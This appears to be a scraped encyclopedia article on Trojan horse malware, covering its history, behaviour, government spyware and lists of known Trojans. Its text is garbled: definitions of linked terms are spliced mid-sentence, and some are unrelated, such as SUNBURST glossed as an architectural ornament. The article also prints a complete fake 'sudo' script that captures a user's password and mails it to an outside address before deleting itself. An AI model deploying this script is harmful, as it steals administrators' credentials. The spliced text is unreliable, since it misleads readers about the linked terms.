computing Computing is any goal-oriented activity requiring, benefiting from, or creating computing machinery. It includes the study and experimentation of algorithmic processes, and development of both hardware and software. Computing has scientific, ...

, a Trojan horse is any malware that misleads users of its true intent. The term is derived from the

Ancient Greek Ancient Greek includes the forms of the Greek language used in ancient Greece and the ancient world from around 1500 BC to 300 BC. It is often roughly divided into the following periods: Mycenaean Greek (), Dark Ages (), the Archaic pe ...

story of the deceptive Trojan Horse that led to the fall of the city of Troy. Trojans generally spread by some form of social engineering; for example, where a user is duped into executing an

email Electronic mail (email or e-mail) is a method of exchanging messages ("mail") between people using electronic devices. Email was thus conceived as the electronic ( digital) version of, or counterpart to, mail, at a time when "mail" mean ...

attachment disguised to appear innocuous (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then have unauthorized access to the affected computer. Ransomware attacks are often carried out using a Trojan. Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.

Use of the term

It's not clear where or when the concept, and this term for it, was first used, but by 1971 the first

Unix Unix (; trademarked as UNIX) is a family of multitasking, multiuser computer operating systems that derive from the original AT&T Unix, whose development started in 1969 at the Bell Labs research center by Ken Thompson, Dennis Ritchie, ...

manual assumed its readers knew both: Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the

Multics Multics ("Multiplexed Information and Computing Service") is an influential early time-sharing operating system based on the concept of a single-level memory.Dennis M. Ritchie, "The Evolution of the Unix Time-sharing System", Communications of ...

computer systems. It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", subtitled: ''To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software.'' He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics.

Behavior

Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more

Command and Control Command and control (abbr. C2) is a "set of organizational and technical attributes and processes ... hatemploys human, physical, and information resources to solve problems and accomplish missions" to achieve the goals of an organization o ...

(C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action. In German-speaking countries,

spyware Spyware (a portmanteau for spying software) is software with malicious behaviour that aims to gather information about a person or organization and send it to another entity in a way that harms the user—for example, by violating their priv ...

used or made by the government is sometimes called ''govware''. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software.Basil Cupa
Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)
LISS 2013, pp. 419–428 Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer and the German "state Trojan" nicknamed R2D2. German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications. Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them. BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection.

Linux example

A ''Trojan horse'' is a

program Program, programme, programmer, or programming may refer to: Business and management * Program management, the process of managing several related projects * Time management * Program, a part of planning Arts and entertainment Audio * Programm ...

that purports to perform some obvious function, yet upon execution it compromises the user's security. One easy program is a new version of the Linux

sudo sudo ( or ) is a program for Unix-like computer operating systems that enables users to run programs with the security privileges of another user, by default the superuser. It originally stood for "superuser do", as that was all it did, and it ...

command. The command is then copied to a publicly writable directory like /tmp. If an administrator happens to be in that directory and executes sudo, then the ''Trojan horse'' might be executed. Here is a working version: : # sudo # ---- # Turn off the character echo to the screen. stty -echo /bin/echo -n "Password for `whoami`: " read x /bin/echo "" # Turn back on the character echo. stty echo echo $x , mail -s "`whoami` password" [email protected] sleep 1 echo Sorry. rm $0 exit 0 To prevent a command-line based ''Trojan horse'', set the . entry in the PATH= environment variable to be located at the tail end. For example: PATH=/usr/local/bin:/usr/bin:..

Notable examples

Private and governmental

ANOM The ANOM (also stylized as AN0M or ΛNØM) sting operation (known as Operation Trojan Shield (stylized TRØJAN SHIELD) or Operation Ironside) is a collaboration by law enforcement agencies from several countries, running between 2018 and 202 ...

- FBI * 0zapftis / r2d2 StaatsTrojaner – DigiTask *

DarkComet DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur (known as DarkCoderSc), an independent programmer and computer security coder from France. Although the RAT was developed back in 2008, it began to proliferate at the st ...

– CIA / NSA * FinFisher – Lench IT solutions / Gamma International * DaVinci / Galileo RCS – HackingTeam * Magic Lantern – FBI *

SUNBURST A sunburst is a design or figure commonly used in architectural ornaments and design patterns and possibly pattern books. It consists of rays or "beams" radiating out from a central disk in the manner of sunbeams. Sometimes part of a sunburs ...

– SVR/

Cozy Bear Cozy Bear, classified by the United States federal government as advanced persistent threat APT29, is a Russian hacker group believed to be associated with one or more intelligence agencies of Russia. The Dutch General Intelligence and Securi ...

(suspected) * TAO QUANTUM/FOXACID – NSA *

WARRIOR PRIDE WARRIOR PRIDE is the GCHQ and NSA code name for a pair of spyware kits that can be installed on the iPhone and Android-based smartphones. Information about these kits was published by the press on 27 January 2014 from the documents leaked by ...

– GCHQ

Publicly available

* EGABTR – late 1980s * Netbus – 1998 (published) *

Sub7 Sub7, or SubSeven or Sub7Server, is a Trojan horse program originally released in 1999. Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven". As of June 2021, the development of Sub7 is being continued. ...

by Mobman – 1999 (published) *

Back Orifice Back Orifice (often shortened to BO) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location.Richtel, Matt.Hacker Group Sa ...

– 1998 (published) * Beast – 2002 (published) * Bifrost Trojan – 2004 (published) *

– 2008-2012 (published) *

Blackhole exploit kit The Blackhole exploit kit was, as of 2012, the most prevalent web threat, where 29% of all web threats detected by Sophos and 91% by AVG are due to this exploit kit. Its purpose is to deliver a malicious payload to a victim's computer. Accord ...

– 2012 (published) *

Gh0st RAT Gh0st RAT is a Trojan horse for the Windows platform that the operators of GhostNet used to hack into many sensitive computer networks. It is a cyber spying computer program. The "RAT" part of the name refers to the software's ability to operate ...

– 2009 (published) * MegaPanzer BundesTrojaner – 2009 (published) * MEMZ by Leurak – 2016 (published)

Detected by security researchers

Twelve Tricks Twelve Tricks is a Trojan horse that first appeared around 1990. Purdue University issued a bulletin about the Trojan on March 8, 1990. The Trojan came in an altered utility file called CORETEST.COM, which was intended to test performance of hard ...

– 1990 *

Clickbot.A Clickbot.A is a botnet that is used for click fraud. The bot was first discovered by Swa Frantzen at SANS' Internet Storm Center in May 2006. At that time, the botnet had infected about 100 machines. The infected population grew to over 100,00 ...

– 2006 (discovered) * Zeus – 2007 (discovered) * Flashback Trojan – 2011 (discovered) * ZeroAccess – 2011 (discovered) *

Koobface Koobface is a network worm that attacks Microsoft Windows, Mac OS X, and Linux platforms. This worm originally targeted users of networking websites like Facebook, Skype, Yahoo Messenger, and email websites such as GMail, Yahoo Mail, and ...

– 2008 (discovered) * Vundo – 2009 (discovered) * Coreflood – 2010 (discovered) * Tiny Banker Trojan – 2012 (discovered) * SOVA - 2022 (discovered) *

Shedun Shedun is a family of malware software (also known as Kemoge, Shiftybug and Shuanet) targeting the Android operating system first identified in late 2015 by mobile security company Lookout, affecting roughly 20,000 popular Android applications. Loo ...

Android malware – 2015 (discovered)

Capitalization

The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while

style guide A style guide or manual of style is a set of standards for the writing, formatting, and design of documents. It is often called a style sheet, although that term also has multiple other meanings. The standards can be applied either for gene ...

s and dictionaries differ, many suggest a lower case "trojan" for normal use.

References

External links

* * {{DEFAULTSORT:Trojan Horse (Computing) Social engineering (computer security) Spyware Web security exploits Cyberwarfare Security breaches